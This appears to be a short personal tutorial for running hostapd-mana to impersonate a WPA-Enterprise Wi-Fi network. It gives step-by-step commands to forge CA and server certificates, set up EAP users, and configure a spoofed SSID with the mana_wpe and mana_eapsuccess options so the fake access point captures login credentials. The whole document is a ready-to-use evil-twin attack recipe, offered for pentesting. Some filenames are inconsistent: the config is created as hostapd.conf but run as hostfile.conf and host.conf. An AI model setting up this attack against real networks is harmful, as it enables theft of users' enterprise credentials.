# hostapd-mana

[hostapd-mana](https://github.com/sensepost/hostapd-mana) is great for pentesting WPA enterprise networks.

## Create a working directory
Create a working directory and navigate to it:

```
mkdir -p ~/mana/certs
cd ~/mana/certs
```

## Generate certificates and keys

### Generate CA private key and certificate
```
openssl genrsa -out ca.key 2048
openssl req -x509 -new -nodes -key ca.key -sha256 -days 3650 -out ca.pem \
    -subj "/C=US/ST=SomeState/L=SomeCity/O=SomeOrgName/OU=SomeDepartment/CN=ACME CO Name Root CA"
```

### Generate server private key and certificate
```
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr \
    -subj "/C=US/ST=SomeCity/L=SomeState/O=SomeOrgName/OU=IT Department/CN=toteslegitwifi.companyname.com"
```

### Sign the server certificate with our CA
```
openssl x509 -req -in server.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out server.pem -days 365 -sha256
```

### Generate DH parameters
```
openssl dhparam -out dhparam.pem 2048
```

## Create EAP user file
Create the EAP user configuration file:

```
echo '*		PEAP,TTLS,TLS,MD5,GTC' > hostapd.eap_user
echo '"t"     	TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP  "1234test"  [2]' >> hostapd.eap_user
```

## Configure hostapd.conf
This needs to be tuned for your specific environment:

```
interface=NAME-OF-YOUR-WIFI-INTERFACE
ssid=SSID-TO-SPOOF
channel=6
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
auth_algs=3

# 802.1x configuration
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user

# Certificate configuration
ca_cert=server.pem
server_cert=server.pem
private_key=server.key
private_key_passwd=
dh_file=dhparam.pem

# MANA specific settings
enable_mana=1
mana_wpe=1
mana_eapsuccess=1

```
## Kill any interfering processes

```
sudo airmon-ng check kill

# Configure interface
sudo ip link set wlx9cefd5faf852 down
sudo iw dev wlx9cefd5faf852 set type monitor
sudo ip link set wlx9cefd5faf852 up

# Stop NetworkManager (optional but recommended)
sudo systemctl stop NetworkManager
```

## Run hostapd-mana
```
sudo hostapd hostfile.conf
```

### Run with a log file
```
sudo hostapd/hostapd host.conf | tee -a log.log
```